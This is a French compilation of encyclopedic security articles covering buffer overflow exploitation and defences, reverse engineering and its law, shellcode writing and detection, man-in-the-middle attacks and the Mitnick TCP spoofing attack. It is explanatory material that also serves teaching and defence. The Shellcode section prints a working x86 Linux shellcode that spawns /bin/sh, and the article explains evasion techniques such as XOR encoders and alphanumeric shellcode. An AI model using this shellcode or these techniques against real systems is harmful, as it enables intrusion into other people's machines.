Trouver l'adresse de début du code malveillant La technique précédente nécessite généralement pour l’attaquant de connaître l’adresse de début du code malveillant. Ceci est assez complexe, car cela demande généralement des essais successifs, ce qui n’est pas une méthode très « discrète ». De plus, il y a de fortes chances que l’adresse de la pile change d’une version à l’autre du programme visé et d’un système d'exploitation à l’autre. L'attaquant veut généralement exploiter une faille sur le plus de versions possible du même programme (afin peut-être de concevoir un virus ou ver). Pour s’affranchir du besoin de connaître l'adresse du début du code malveillant, il doit trouver une méthode qui lui permette de brancher sur son code sans se préoccuper de la version du système d'exploitation et du programme visé tout en évitant de faire de multiples tentatives qui prendraient du temps et dévoileraient peut-être sa présence. Il est possible dans certains cas de se servir du contexte d’exécution du système cible. Par exemple, sur des systèmes Windows, la plupart des programmes, même les plus simples contiennent un ensemble de primitives système accessibles au programme (DLL). Il est possible de trouver des bibliothèques dont l’adresse mémoire lors de l’exécution change peu en fonction de la version du système. Le but pour l’attaquant est alors de trouver dans ces plages mémoires des instructions qui manipulent la pile d'exécution et lui permettront d’exécuter son code. Par exemple, en supposant que la fonction strcpy manipule un registre processeur (eax) pour y stocker l’adresse source. Dans l’exemple précédent, eax contiendra une adresse proche de l’adresse de buffer au retour de strcpy. Le but de l’attaquant est donc de trouver dans la zone mémoire supposée « fixe » (la zone des DLL par exemple) un code qui permet de sauter vers le contenu de eax (call eax ou jmp eax). Il construira alors son buffer en plaçant son code suivi de l’adresse d’une instruction de saut (call eax ou jmp eax). Au retour de strcpy, le processeur branchera vers une zone mémoire contenant call eax ou jmp eax et puisque eax contient l’adresse du buffer, il branchera de nouveau vers le code et l’exécutera.

Construire son code d’exploitation Article détaillé : Shellcode. La deuxième difficulté pour l'attaquant est la construction du code d’exploitation appelé shellcode. Dans certains cas, le code doit être construit avec un jeu de caractères réduit : chaîne Unicode, chaîne alphanumérique, etc. En pratique, ces limitations n'arrêtent pas un attaquant déterminé. On recense des cas de piratage utilisant du code limité aux caractères légaux d'une chaîne Unicode (mais il faut pouvoir exécuter du code automodifiant). Dépassement de tampon 39

Préventions Pour se prémunir contre de telles attaques, plusieurs options sont offertes au programmeur. Quelques-unes de ces options sont décrites dans les deux sections suivantes.

Protections logicielles • Modifier le compilateur pour qu’il insère des instructions NOP de façon aléatoire dans le code du noyau et des applications (opérations de routine en Linux). Cela ralentit peu les programmes et complique énormément la tâche de l'attaquant qui ne sait plus quelles adresses il doit viser. • Utiliser des options de compilation permettant d'éviter les dépassements de mémoire tampons connus sous le nom de SSP (Stack-Smashing Protector). • Utilisation de langages à contexte d'éxecution managée implémentant la vérification de bornes des tableaux (e.g. Java) connu sous le nom de Bounds checking. • Utiliser des outils externes qui permettent, en mode développement, de tester les cas litigieux, par exemple la bibliothèque Electric Fence ou Valgrind. • Bannir de son utilisation les fonctions dites « non protégées ». Préférer par exemple strncpy à strcpy ou alors fgets à scanf qui effectue un contrôle de taille. Les compilateurs récents peuvent prévenir le programmeur s’il utilise des fonctions à risque, même si leur utilisation demeure possible. • Protéger, côté système, la pile d'exécution : •• Rendre la pile non exécutable, • Mettre en place un mécanisme de vérification de la pile comme la technique du canari. Le principe est de stocker une clé de valeur aléatoire, générée à l’exécution, entre la fin de la pile et l'adresse de retour. Si cette clé est modifiée, l’exécution est avortée (disponible en option dans les compilateurs C récents, éventuellement avec recours à des patchs). La principale critique de cette méthode est que l’appel de fonction est ainsi ralenti. Aucune de ces solutions logicielles ne s’est imposée (en 2008) dans le monde du développement industriel. Pourtant, les dépassements de tampon représentent une part encore importante des failles permettant le développement de vers, de virus et d'attaques manuelles.

Protections matérielles • Les microprocesseurs récents, 64 bits notamment, implémentent des protections efficaces (technologies NX Bit et XD bit).

Cas particulier de dépassement de tampon : débordement de nombre entier Il est fréquent d'allouer dynamiquement des tableaux de structure de données, ce qui implique le calcul de la taille totale du tableau : taille_d'un_élément * nombre_d'éléments. Un tel produit peut donner un nombre trop grand pour être enregistré dans l'espace normalement alloué à un nombre entier. On a alors un dépassement d'entiers et le produit est tronqué, ce qui donne un résultat erroné plus petit que le résultat attendu. La zone mémoire allouée au tableau est alors de taille inférieure à ce qu'on pense avoir alloué. C'est un cas très particulier de dépassement de tampon, qui peut être utilisé par un attaquant. Dépassement de tampon 40

Autres types de dépassement de tampon Il existe plusieurs autres types de dépassements de tampon. Ces failles de sécurité ont été couramment exploitées depuis le début des années 2000, en particulier dans OpenSSH et dans les bibliothèques de lecture de pratiquement tous les types d'image.

Dépassement de tas En plus des techniques de piratage basées sur les dépassements de tampon, il existe d'autres techniques de piratage qui exploitent le débordement d'autres variables contenues dans d’autres parties de la mémoire. En particulier, plusieurs attaques exploitent le débordement des variables du tas. Ces dépassements sont appelés dépassement de tas (en anglais, heap overflow).

Rétroingénierie

Pour les articles homonymes, voir Reverse engineering. La rétroingénierie (traduction littérale de l'anglais reverse engineering), également appelée rétroconception, ingénierie inversée ou ingénierie inverse, est l'activité qui consiste à étudier un objet pour en déterminer le fonctionnement interne ou la méthode de fabrication. Plusieurs objectifs peuvent être visés par cette analyse : • comprendre le fonctionnement de cet objet, pour être en mesure de l'utiliser correctement, de le modifier, ou encore de s'assurer de son bon fonctionnement[1]; •• fabriquer une copie de cet objet alors qu'on ne peut en obtenir ni les plans ni les méthodes de fabrication (activité généralement illégale sur un plan juridique) ; •• créer un nouvel objet ayant des fonctionnalités identiques à l'objet de départ, sans violer de brevet ; •• analyser un objet produit par un concurrent, soit dans le cadre d'une activité de veille concurrentielle soit pour détecter d'éventuelles violations de brevets. Suivant la nature de l'objet et l'objectif, différentes méthodes et techniques sont utilisées. Pour des objets physiques, il est possible de démonter le système jusqu'à un certain point pour en analyser les constituants. En électronique et en informatique, la démarche peut être celle de l'étude d'une boîte noire : on isole l'objet à étudier, on détermine les entrées et les sorties actives. On essaie ensuite de déterminer la réponse du système en fonction des variations du ou des signaux en entrée.

Brève histoire de la rétroingénierie Celle-ci s'applique principalement dans le domaine militaire depuis la nuit des temps. C'est ainsi que, selon L'Histoire de Polybe, à partir de la capture d'une birème phénicienne, superpuissance maritime de l'époque, seulement 40 jours avant la bataille de la pointe d'Italie, que les Romains, alors puissance uniquement continentale, ont réussi à imposer leur domination maritime sur l'ensemble de la Méditerranée en copiant le procédé de standardisation employé par les carthaginois, leur permettant de bâtir à partir de rien et en un temps record une véritable flotte de combat approchant les 80 navires, y ajoutant quelques perfectionnements tels que le corvus (sorte de passerelle d'abordage dotée d'un crochet de bronze en forme de bec de corbeau, se fichant avec force dans le pont du navire abordé), puis quelques décennies plus tard sur les trirèmes, le xylokastron (château de bois) en proue, les balistes de marine, qui malgré leur début chaotique en raison de la modification du centre de gravité rendant dangereuse leur utilisation par mer agitée, permirent de transformer les batailles navales en affrontements d'infanterie à partir de la première bataille de Mylae en -260. Rétroingénierie 41

Rétroingénierie des objets physiques Le principe de la rétroconception repose sur la prise d’un nuage de points issu de la surface de l’objet à scanner numériquement ou à palper mécaniquement. Ce nuage de points est traité par des fonctions CAO permettant la reconstruction de surfaces à partir desquelles un modèle paramétrique est codéfini par l'utilisateur et le système générateur (choix des côtes et des relations intercotes, tolérance...) L'arbre de construction est ainsi redéfini dans sa majeure partie. Cette méthode n'est applicable que pour des objets CAO "manufacturables" car seules des opérations de conception (extrusion, trou débouchant...) et de fabrication (retrait, tolérances...) non virtuelles sont potentiellement acceptables pour la reproduction physique de l'objet. Quelles sont les différentes raisons d’utiliser la rétroconception ? • La conception originelle n’est pas supportée par une documentation suffisante ou adéquate. •• Le modèle originel de CAO n'est pas suffisant pour soutenir des modifications et/ou les procédés de fabrication courante. •• Le fabricant originel n'existe plus ou ne fabrique plus le produit, mais il y a des besoins pour le produit. •• Composants usés ou cassés pour lesquels il n'y a aucune source d'approvisionnement. •• Renforcement des fonctionnalités. •• Analyse des fonctionnalités des produits des concurrents. •• Amélioration de la performance et/ou les fonctionnalités de produit. •• Manque de pièces additionnelles (pièces de rechange). •• Actualisation des matériaux désuets ou des processus de fabrication désuets.

Rétroingénierie en électronique Il y a la possibilité de refaire un schéma électronique en analysant un circuit imprimé. On peut aussi, sur certains dispositifs informatisés, récupérer le code assembleur de leur firmware. Le code source est alors élaboré à partir de l'image mémoire de ces composants. On parle alors de désassemblage. Il est parfois possible de dialoguer avec un objet via des liaisons laissées à la discrétion du boitier (interfaces sérielles, JTAG, ICSP...).

Rétroingénierie en informatique La rétroingénierie s'applique aussi au logiciel. Ceci peut être réalisé en utilisant des outils d'analyse comme le désassembleur ou le décompilateur. Les méthodes employées sont similaires à celle du débogage. Le projet Samba est un exemple typique de rétroingénierie. L'équipe a dû déterminer le fonctionnement du partage de ressources en réseau du système d'exploitation Microsoft Windows sans avoir accès aux spécifications techniques officielles. Ils ont donc dû les déterminer puis les traduire sous forme d'un programme informatique. Il en va de même pour le système de fichier NTFS. La rétroingénierie logicielle est fréquemment appliquée aux structures de données : il s'agit, dans ce cas de figure, d'effectuer une documentation des structures de données physiques peu ou mal documentées (applications vieillissantes). On essaie de reconstituer un modèle de données à partir des structures physiques des fichiers ou des tables. La rétroingénierie logicielle fut popularisée avec le détournement des protections anticopie des jeux vidéo[réf. nécessaire]. Cette activité est appelée cracking. Pour écrire des pilotes pour certains périphériques (webcam, scanneur, etc.), les développeurs de logiciels libres se retrouvent souvent contraints à faire de la rétroingénierie sur le pilote en interceptant les échanges entre la puce et le pilote, découvrant ainsi comment dialoguer avec la puce. Il s'agit alors de simuler le pilote, puis de faire mieux (Cf. pilote Linux de webcam spca, pwc, etc.[réf. nécessaire]). Un exemple est le projet Nouveau visant à produire des pilotes 3D libres pour les cartes graphiques NVIDIA ou radeonHD, projet similaire pour les cartes graphiques ATI Radeon HD. Rétroingénierie 42

En cryptographie, la rétroingénierie prend plusieurs formes avec des attaques cryptanalytiques. Le but est d'extraire des informations secrètes depuis la « boîte noire » symbolisant la procédure de chiffrement. Ces types d'attaques sont nommés attaques par canaux auxiliaires. On pense que la rétroingénierie est aussi à l'origine de la fuite des algorithmes RC2 et RC4 qui furent diffusés sur Internet via le groupe de discussion sci.crypt. L'algorithme Arcfour est d'ailleurs un clone de RC4.

Légalité de la rétroingénierie informatique De nombreux éditeurs de logiciels propriétaires incluent dans leurs CLUF des clauses interdisant la rétroingénierie. Cependant dans de nombreux pays la rétroingénierie est autorisée par la loi, notamment à des fins d'interopérabilité. Dans ces pays, les clauses de ces CLUF ne sont pas valables, ou tout au plus dans les limites déterminées par la loi. Par exemple en France, ce droit est garanti par l'article L122-6-1 du code de la propriété intellectuelle[2].

Programmes en langages intermédiaires Les langages de programmation semi-compilés (compilé en un code binaire interprété par une machine virtuelle) tels que Java et .NET rendent la rétroingénierie plus aisée. Ainsi, la rétroingénierie de fichiers binaires exécutables destinés à la plate-forme Java peut se réaliser avec le programme ArgoUML. Pour les programmes .NET, Microsoft fournit en standard ILDASM [3], et il existe également des décompilateurs .NET [4] (en)

La rétroingénierie comme défense • Étude de binaire malicieux (rootkit) dans le cadre d'une attaque informatique. • Étude de virus informatique pour l'amélioration d'un antivirus ou en vue d'apporter un moyen d'éradication. •• Étude et recherche de vulnérabilités dans les logiciels, afin d'améliorer leur sécurité.

La rétroingénierie comme activité de veille technologique La rétroingénierie est aussi une activité de veille technologique. Elle est orientée vers : •• l'étude des produits concurrents, •• la compréhension des méthodes utilisées par le concurrent, •• la recherche des fournisseurs, •• la détermination des composants utilisés, •• l'estimation du coût de revient à partir de tout ou partie des informations précédentes, •• la décomposition du coût d'une pièce en évaluant chacun de ses composants, la matière utilisée, le temps de fabrication et la méthode, •• l'identification d'éventuelles violations de brevets commises par un concurrent ou à éviter. Rétroingénierie 43

Législation

France Extrait de l'article L. 331-5 du code de la propriété intellectuelle : Les mesures techniques ne doivent pas avoir pour effet d'empêcher la mise en œuvre effective de l'interopérabilité, dans le respect du droit d'auteur. Les fournisseurs de mesures techniques donnent l'accès aux informations essentielles à l'interopérabilité dans les conditions définies aux articles L. 331-6 et L. 331-7. Extrait de l'article L. 331-7 du code de la propriété intellectuelle : Tout éditeur de logiciel, tout fabricant de système technique et tout exploitant de service peut, en cas de refus d'accès aux informations essentielles à l'interopérabilité, demander à l'Autorité de régulation des mesures techniques de garantir l'interopérabilité des systèmes et des services existants, dans le respect des droits des parties, et d'obtenir du titulaire des droits sur la mesure technique les informations essentielles à cette interopérabilité. Depuis 2006, le chapitre IV du Titre I du Droit d'auteur et droits voisins dans la société de l'information interdit le contournement des mesures technique de protection, en particulier la gestion des droits numériques. Extrait de l'article 13 du DADVSI : Les mesures techniques ne doivent pas avoir pour effet d'empêcher la mise en œuvre effective de l'interopérabilité, dans le respect du droit d'auteur. Les fournisseurs de mesures techniques donnent l'accès aux informations essentielles à l'interopérabilité dans les conditions définies aux articles L. 331-6 et L. 331-7. Extrait du nouvel article Art. L. 335-3-1 introduit l'article 22 du DADVSI : I. - Est puni de 3 750 EUR d'amende le fait de porter atteinte sciemment, à des fins autres que la recherche, à une mesure technique efficace telle que définie à l'article L. 331-5, afin d'altérer la protection d'une œuvre par un décodage, un décryptage ou toute autre intervention personnelle destinée à contourner, neutraliser ou supprimer un mécanisme de protection ou de contrôle, (...) II. - Est puni de six mois d'emprisonnement et de 30 000 EUR d'amende le fait de procurer ou proposer sciemment à autrui, directement ou indirectement, des moyens conçus ou spécialement adaptés pour porter atteinte à une mesure technique efficace (...) (...) IV. - Ces dispositions ne sont pas applicables aux actes réalisés à des fins de recherche (...) ou de sécurité informatique, dans les limites des droits prévus par le présent code.

États-Unis Comme un brevet nécessite de publier l'invention, on peut se passer de rétroingénierie pour étudier les éléments brevetés. L'une des principales motivations de la rétroingénierie est de déterminer si un produit concurrent viole un brevet ou des droits d'auteur. Depuis 1998, le Digital Millennium Copyright Act interdit le contournement des mesures techniques de protection.

Notes et références

[1] http:/ / www2. laas. fr/ LIS/ Journee-COTS/ 02-Standards. pdf

[2] (http:/ / www. legifrance. gouv. fr/ affichCodeArticle. do?cidTexte=LEGITEXT000006069414& idArticle=LEGIARTI000006278920&

dateTexte=& categorieLien=cid)

[3] http:/ / msdn. microsoft. com/ library/ fre/ default. asp?url=/ library/ FRE/ cptutorials/ html/ IL_DASM_Tutorial. asp

[4] http:/ / www. program-transformation. org/ Transform/ DotNetDecompilers Shellcode 44 Shellcode

Un shellcode est une chaîne de caractères qui représente un code binaire exécutable. À l'origine destiné à lancer un shell ('/bin/sh' sous Unix ou command.com sous DOS et Microsoft Windows par exemple), le mot a évolué pour désigner tout code malicieux (et souvent malveillant) qui détourne un programme de son exécution normale. Un shellcode peut être utilisé par un hacker voulant avoir accès à la ligne de commande.

Fonctionnement d'un shellcode Généralement, les shellcodes sont injectés dans la mémoire de l'ordinateur grâce à l'exploitation d'un dépassement de tampon. Dans ce cas, l'exécution du shellcode peut être déclenchée par le remplacement dans la pile (stack en anglais) de l'adresse normale de retour par l'adresse du shellcode injecté. Ainsi, lorsque la routine est terminée, le microprocesseur, qui doit normalement exécuter les instructions situées à l'adresse de retour, exécute le shellcode.

Écriture de shellcodes L'écriture de shellcodes est soumise à des contraintes. En effet, un shellcode est une chaîne de caractères qui va être injectée en mémoire car elle sera en dehors de l'espace normalement alloué. Or les chaînes de caractères, dans la plupart des langages de programmation, ont l'octet nul (0x00) comme marqueur de fin. Par exemple la fonction strcpy en C arrête la copie de chaine dès qu'elle rencontre cet octet. Un shellcode ne peut donc pas contenir d'octet 0x00, sinon, il ne sera pas entièrement copié. L'écriture d'un shellcode demande alors de n'avoir recours à aucune instruction assembleur contenant un octet nul (à l'exception du dernier). La tâche étant ardue, les concepteurs de shellcodes importants écrivent initialement un « chargeur » de shellcode servant à transformer un code assembleur (pouvant contenir des octets nuls) en un code ne contenant pas d'octet nul (le code du chargeur devant à son tour être écrit sans caractère nul). Une technique classique consiste à transformer chaque octet du code par une opération « ou exclusif » (XOR) : cette opération est simple, réversible, et on peut généralement (quoique pas à coup sûr) trouver une « clé » à appliquer au « ou exclusif » permettant d'éviter les caractères nuls. Dans certains contextes, les contraintes sont encore plus sévères : le jeu d'octets autorisés peut être encore plus réduit. Il est possible que la chaîne envoyée au programme vulnérable ait précédemment été filtrée pour ne faire passer que des caractères alphanumériques (ayant un code ASCII compris entre 32 et 127 par exemple). On trouve un autre exemple classique sur certains systèmes fonctionnant en interne en UTF-16 (cf Unicode) : il arrive qu'une chaîne de caractères codée sur 8 bits soit d'abord « étendue » en UTF-16 (en ajoutant un 0 un octet sur deux généralement) puis traitée. Dans ce cas, les instructions qui pourront être exécutées par l'attaquant seront forcément de la forme XX00 (en hexadécimal), ce qui complique énormément la tâche du concepteur de shellcode. Dans ces deux cas, la technique est la même que précédemment : écrire un « décodeur » avec ces contraintes qui transforme (en mémoire) le véritable code malveillant encodé précédemment. L'écriture du cœur du code malveillant (on parle de payload) est alors plus facile et indépendante du type de contraintes de la cible. Ainsi, il existe actuellement de véritables bibliothèques de construction de shellcodes permettant de l'assembler par type de fonction à réaliser et par contraintes (par "codeur" à intégrer). Shellcode 45

Détection de shellcodes L'exploitant agissant généralement avec une certaine marge d'erreur lors de l'exploitation d'une faille dans la découverte de la bonne adresse mémoire (voir Dépassement de tampon), le shellcode est préfixé d'un maximum d'instructions nulpotentes (opcode NOP, codé 0x90 sur architecture 80x86) pour optimiser les chances d'exécution du shellcode. Ainsi, la première méthode de détection de shellcodes a été de repérer les séries de NOP en mémoire pour empêcher d'exécuter le shellcode qui suit les NOP. Cette méthode est cependant relativement coûteuse en temps de calcul. D'autres méthodes se basent sur le fait qu'un shellcode contient souvent certaines chaînes de caractères spécifiques servant à ouvrir un shell comme /bin/sh. Un programme faisant référence à cette chaîne de caractères est donc suspect et il est alors possible d'empêcher son exécution. Cependant, les hackers peuvent outrepasser ces méthodes basiques de détection en chiffrant cette chaîne de caractères, ou même en utilisant du code polymorphe[1]. Un autre moyen de détection est de regarder si le programme essaye d'accéder à une zone mémoire qui n'est pas attribuée au programme en cours.

Exemple de shellcode Exemple de shellcode, largement publié (voir liens externes), d'une cinquantaine d'octets permettant d'exécuter (via un appel à l'interruption 0x80) le programme /bin/sh. Ce shellcode est programmé avec des instructions ne contenant aucun caractère nul. Il ne fonctionne que sur architecture 80x86, sous Linux.

char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";

Notes et références

[1] voir Code impénétrable et Virus polymorphe

Liens externes

Cet article ou cette section a trop de liens externes. Les liens externes doivent être des sites de référence dans le domaine du sujet. Il est souhaitable — si cela présente un intérêt — de citer ces liens comme source et de les enlever du corps de l'article ou de la section « Liens externes ».

• (en) Shell-Storm (http:/ / www. shell-storm. org/ shellcode/ ) Bases de données sur le développement des shellcodes

• (en) Smashing the Stack for Fun and Profit (http:/ / www. phrack. org/ archives/ 49/ P49-14) ( traduction (https:/ /

www. dg-sc. org/ phrack-fr/ phrack-fr/ phrack49-fr/ p49fr. txt)), Phrack volume 49 - L'introduction historique au dépassement de tampon et à la création de shellcode

• (en) Building IA32 'Unicode-Proof' Shellcodes (http:/ / www. phrack. org/ archives/ 61/

p61-0x0b_Building_IA32_UnicodeProof_Shellcodes. txt) ( traduction (https:/ / www. dg-sc. org/ phrack-fr/

phrack-fr/ phrack61-fr/ p61-0x0b. txt)), Phrack volume 61 - Les shellcodes en environnement Unicode UTF-16

• (en) Writing ia32 alphanumeric shellcodes (http:/ / www. phrack. org/ archives/ 57/ p57-0x0f) , Phrack volume 57 - Ecriture de shellcodes avec des caractères "imprimables"

• (en) Real Win32 Generic Shellcode (http:/ / www. chez. com/ mvm/ RW32GS. txt) - Écriture de shellcodes génériques sous Windows en utilisant la technique du PEB Shellcode 46

• (en) Unix et Windows assembly components (http:/ / www. lsd-pl. net/ projects/ ) - kit de construction de shellcodes sur plusieurs architectures.

• (fr) Section Shellcodes de Ghosts In The Stack (http:/ / www. ghostsinthestack. org/ cat-10-shellcodes. html) - Articles sur les shellcodes, leur conception, l'élévation des privilèges, les shellcodes polymorphiques, etc.

• (fr) ShellForge - générateur de shellcodes (http:/ / www. secdev. org/ projects/ shellforge/ )

• Portail de la sécurité informatique 47

2.2-Réseau

Attaque de l'homme du milieu

L'attaque de l'homme du milieu (HDM) ou man in the middle attack (MITM) est une attaque qui a pour but d'intercepter les communications entre deux parties, sans que ni l'une ni l'autre ne puisse se douter que le canal de communication entre elles a été compromis. Le canal le plus courant est une connexion à Internet de l'internaute lambda. L'attaquant doit d'abord être capable d'observer et d'intercepter les messages d'une victime à l'autre. L'attaque « homme du milieu » est particulièrement applicable dans le protocole original d'échange de clés Diffie-Hellman, quand il est utilisé sans Schéma de l'attaque de l'homme du milieu: authentification. Avec authentification, Diffie-Hellman est en revanche Mallory intercepte les communications entre invulnérable aux écoutes du canal, et est d'ailleurs conçu pour cela. Alice et Bob

Le problème de l'échange des clés Un des problèmes majeurs lorsque deux personnes veulent échanger des données chiffrées, est celui de la transmission des clés : pour s'assurer d'être les seuls à connaître ces informations secrètes, les correspondants doivent pouvoir l'échanger de façon confidentielle. Dans le cadre de la cryptographie symétrique, il faut disposer d'un canal sécurisé qui lui-même nécessite une clé pour être établi. Le problème entre ainsi dans un cercle vicieux. Dans le cadre de la cryptographie asymétrique, il a été en partie résolu. Les deux personnes possèdent chacune leur clé publique (qui sert à chiffrer) et leur clé privée (qui sert à déchiffrer). Ainsi, seules les clés publiques sont échangées, ce qui ne nécessite pas un canal sécurisé. Même si quelqu'un réussissait à intercepter et à lire ces clés publiques, elles ne lui seraient d'aucune utilité pour déchiffrer, en partant du principe que l'algorithme de chiffrement est cryptographiquement sûr. La résolution complète du problème nécessite une Infrastructure à clés publiques. En effet, dans la cryptographie asymétrique, il serait possible à un tiers, l'homme du milieu, de remplacer les clés publiques échangées par ses propres clefs publiques. Il lui serait alors possible d'intercepter tous les messages, de les déchiffrer avec ses clefs privées et de les re-signer aussi. Le rôle d'une Infrastructure à clés publiques est donc de certifier que les clefs publiques correspondent bien aux deux parties. Attaque de l'homme du milieu 48

L'attaque de l'homme du milieu L'attaque de l'homme du milieu ajoute comme condition supplémentaire que l'attaquant ait la possibilité non seulement de lire, mais de modifier les messages. Dans ce cas, même le chiffrement asymétrique est vulnérable. Toutefois, il est généralement très difficile de pouvoir modifier l'intégralité des messages qui transitent. Le but de l'attaquant est de se faire passer pour l'un (voire les 2) correspondants, en utilisant, par exemple : • L'ARP Spoofing : c'est probablement le cas le plus fréquent. Si l'un des interlocuteurs et l'attaquant se trouvent sur le même réseau local, il est possible, voire relativement aisé, pour l'attaquant de forcer les communications à transiter par son ordinateur en se faisant passer pour un « relais » (routeur, passerelle) indispensable. Il est alors assez simple de modifier ces communications. • Le DNS Poisoning : L'attaquant altère le ou les serveur(s) DNS des parties de façon à rediriger vers lui leurs communications sans qu'elles s'en aperçoivent. • L'analyse de trafic afin de visualiser d'éventuelles transmissions non cryptées • Le déni de service : l'attaquant peut par exemple bloquer toutes les communications avant d'attaquer un parti. L'ordinateur ne peut donc plus répondre et l'attaquant a la possibilité de prendre sa place.

Déroulement Alice et Bob veulent échanger des données confidentielles, et Carole, jalouse, veut les intercepter. Ils possèdent chacun une clé privée (resp. As, Bs et Cs) et une clé publique (resp. Ap, Bp et Cp).

Cas normal

•• Alice et Bob échangent leur clé publique. Carole peut les lire, elle connaît donc Ap et Bp. •• Si Alice veut envoyer un message à Bob, elle chiffre ce message avec Bp. Bob le déchiffre avec Bs. •• Carole, qui ne possède que Cs, ne peut pas lire le message.

Attaque

Admettons maintenant que Carole soit en mesure de modifier les échanges entre Alice et Bob. Échange classique : Bob envoie un message à Alice •• Bob envoie sa clé publique à Alice. Carole l'intercepte, et renvoie à Alice sa propre clé publique (Cp) en se faisant passer pour Bob. •• Lorsque Alice veut envoyer un message à Bob, elle utilise donc, sans le savoir, la clé publique de Carole. •• Alice chiffre le message avec la clé publique de Carole et l'envoie à celui qu'elle croit être Bob. •• Carole intercepte le message, le déchiffre avec sa clé privée (Cs) et peut lire le message. •• Puis elle chiffre à nouveau le message avec la clé publique de Bob (Bp), après l'avoir éventuellement modifié. •• Bob déchiffre son message avec sa clé privée, et ne se doute de rien puisque cela fonctionne. Ainsi, Alice et Bob sont chacun persuadés d'utiliser la clé de l'autre, alors qu'ils utilisent en réalité tous les deux la clé de Carole. Attaque de l'homme du milieu 49

Solutions Il existe différents moyens pour se prémunir de cette attaque : • Obtenir la clé publique de son interlocuteur par un tiers de confiance. Si les deux interlocuteurs possèdent un contact en commun (le tiers de confiance) alors ce dernier peut servir d'intermédiaire pour transmettre les clés. Les infrastructures à clés publiques sont des systèmes ou des organismes qui permettent de vérifier la validité des clés en se basant principalement sur des certificats. •• Échanger les clés par un moyen qui ne permet pas cette attaque : en main propre, par téléphone, etc. • Vérifier le niveau de confiance qui a été accordée à la clé que l'on a en sa possession : certains logiciels comme GnuPG proposent de mettre la clé publique en ligne sur un serveur. Sur ce serveur, d'autres utilisateurs peuvent faire connaître le degré de confiance qu'ils accordent à une clé. On obtient ainsi un graphe qui relie les différents utilisateurs. •• Authentification avec un mot de passe ou autre système avancé, comme la reconnaissance vocale ou biologique. Un « degré de certitude » est obtenu en appliquant des règles en fonction des valeurs présentes sur le chemin entre deux utilisateurs. Ce degré est informel, mais permet d'avoir une estimation de la pertinence d'une clé et l'identité qui lui est associée. Il ne doit toutefois pas être considéré comme une preuve de sécurité absolue.

Liens externes • (en) Non-cryptographic MITM attack involving nanny references - un exemple d'attaque HDM [1] • (fr) Les attaques du singe intercepteur contre SSH et HTTPS [2]

• Portail de la sécurité informatique • Portail de la cryptologie

Références

[1] http:/ / www. schneier. com/ crypto-gram-0404. html#6

[2] http:/ / www. hsc. fr/ ressources/ presentations/ mitm/ Attaque de Mitnick 50 Attaque de Mitnick

L'attaque de Mitnick sur le réseau de Tsutomu Shimomura fait sûrement partie des cas d'intrusion les plus connus dans la sécurité informatique[1]. Elle était connue en théorie dans le milieu universitaire depuis la moitié des années 1980, mais jamais encore mise en pratique. Son côté inédit a donc fortement contribué à sa diffusion. Elle utilisait en réalité deux techniques distinctes: l'inondation de requêtes SYN et le vol de session TCP.

Cadre théorique

Identification d'une liaison de confiance Pour mettre en œuvre l'attaque, il est nécessaire que la machine cible entretienne une liaison de confiance avec une autre machine, autrement dit, qu'il existe un hôte qui peut se connecter à la machine cible sans besoin d'authentification. L'IP spoofing consiste alors à abuser la machine cible en se faisant passer pour cet hôte de confiance en usurpant son adresse IP. Dans la pratique, sur les stations de travail UNIX, cette liaison de confiance se fait à l'aide des fichiers /etc/hosts.equiv et .rhosts dans le répertoire principal de l'utilisateur. La syntaxe du fichier /etc/hosts.equiv édité par l'utilisateur root est la suivante : site.equivalent.1 site.equivalent.2 site.equivalent.3

Dans ce cas, si quelqu'un tente de se connecter sur le site par rlogin, rsh ou rcp, le système vérifie si le message provient d'un site figurant dans /etc/hosts.equiv. Si c'est le cas, il inspecte alors le fichier /etc/passwd pour vérifier s'il possède un compte ayant le même nom d'utilisateur que l'utilisateur du système distant. Si la réponse est positive, l'accès distant est autorisé sans besoin de fournir le mot de passe du compte. Si l'utilisateur distant tente de se connecter sous un autre nom d'utilisateur, le fichier /etc/hosts.equiv ne sera pas consulté. Ce fichier n'est pas suffisant pour se connecter directement en tant que root. La syntaxe du fichier .rhosts dans le répertoire principal d'un utilisateur est la suivante : site.autorise.1 tux site.autorise.2

Dans cet exemple, l'utilisateur tux a le droit de se connecter au compte à partir du site site.autorise.1. La deuxième ligne signifie que seul le même nom d'utilisateur que le propriétaire du fichier .rhosts aura le droit de se connecter à partir de site.autorise.2.

Prévoir le numéro de séquence La partie la plus délicate de l'attaque réside sans doute dans la prédiction du numéro de séquence lors d'une demande de connexion TCP. L'établissement d'une connexion TCP se fait en trois temps : • le client envoie au serveur un paquet avec un drapeau SYN et un numéro de séquence initial (ISN : Initial Sequence Number) • le serveur renvoie alors au client un paquet avec un drapeau SYN|ACK de numéro de séquence et un numéro d'acquittement égal à • le client répond par un paquet avec un drapeau ACK de numéro de séquence et un numéro d'acquittement égal à La connexion est alors établie. Le client et le serveur peuvent commencer à échanger des données. Attaque de Mitnick 51

Quand l'attaquant effectue la première étape de ce procédé, il va mettre l'adresse IP de l'hôte de confiance de la cible comme adresse source dans l'en-tête IP du paquet SYN. Mais quand la cible répond par un paquet SYN|ACK, ce dernier va être envoyé au véritable propriétaire de l'adresse à savoir l'hôte de confiance. L'attaquant ignore donc le numéro de séquence envoyé par la cible, or il en a besoin pour établir la connexion. En effet, s'il se trompe de numéro d'acquittement, la cible va envoyer un paquet RESET qui met fin à la procédure. C'est pour cette raison que cette attaque est qualifiée d'« attaque à l'aveugle ». L'attaquant a donc besoin de prédire le numéro de séquence envoyé par la cible en fonction du numéro de séquence initiale du paquet qu'il a envoyé. Mais s'il arrive à deviner une plage de valeurs possibles, il peut éventuellement « inonder » la cible avec des paquets ACK et espérer que l'un des paquets aura le bon numéro d'acquittement. Si l'attaquant a déjà compromis une machine se trouvant sur le même réseau local que sa cible, il peut aussi par exemple effectuer un sniffing pour intercepter ce paquet et obtenir le bon numéro de séquence.

